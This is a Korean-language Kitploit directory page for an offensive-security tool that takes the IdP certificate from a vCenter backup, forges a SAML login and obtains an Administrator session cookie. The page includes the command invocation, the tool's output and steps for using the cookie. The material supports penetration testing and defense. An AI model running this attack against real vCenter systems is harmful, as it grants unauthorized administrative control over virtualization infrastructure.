Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
vcenter_saml_login — vCenter 백업에서 IdP 인증서를 추출하고 Administrator로 로그인하는 도구 | Kitploit
도구/GitHubGitHub/horizon3ai/vcenter_saml_login
Authentication & AuthorizationCloud Infrastructure SecurityPrivilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubhorizon3ai/vcenter_saml_login

vcenter_saml_login

vCenter 백업에서 IdP 인증서를 추출하고 Administrator로 로그인하는 도구

저장소 보기
52995733년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

vCenter SAML 로그인 도구

vCenter 백업에서 IdP(Identity Provider) 인증서를 추출하고 Administrator로 로그인하기 위한 도구

배경

일반적으로 엔지니어링 진행 중 파일 서버에 있는 vCenter 백업에 접근하거나 최근 CVE를 통해 VCSA 호스트의 root 권한을 획득하게 됩니다. vCenter vSphere UI에 로그인하면 더 많은 시스템과 기밀 정보에 쉽게 접근할 수 있을 뿐만 아니라 고객에게 이러한 발견의 영향을 보여줄 수 있습니다.

data.mdb 파일에는 인증서가 포함되어 있으며 vCenter 백업 내부와 root 권한이 있는 VCSA 호스트에서 찾을 수 있습니다. 이러한 인증서는 평문으로 저장되며 기본 제공 Administrator를 포함한 모든 사용자의 SAML 인증 요청에 서명하는 데 사용될 수 있습니다.

이 도구의 여러 사용 사례와 vCenter 호스트에 대한 관리자 액세스 권한을 획득하기 위해 이를 사용한 방법에 대해 자세히 알아보려면 블로그 게시물을 확인하세요: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

사용법

root@kitploit:~
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

위 쿠키를 사용하여 https://<VCSA>/ui 에서 VCSA 인스턴스에 접속하고 /ui 경로 아래에 쿠키를 추가한 다음 https://<VCSA>/ui 로 다시 이동하세요.

데모

면책 조항

이 소프트웨어는 학술 연구와 효과적인 방어 기술 개발을 목적으로만 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 데 사용하기 위한 것이 아닙니다. 프로젝트 유지 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하세요.

도구 다운로드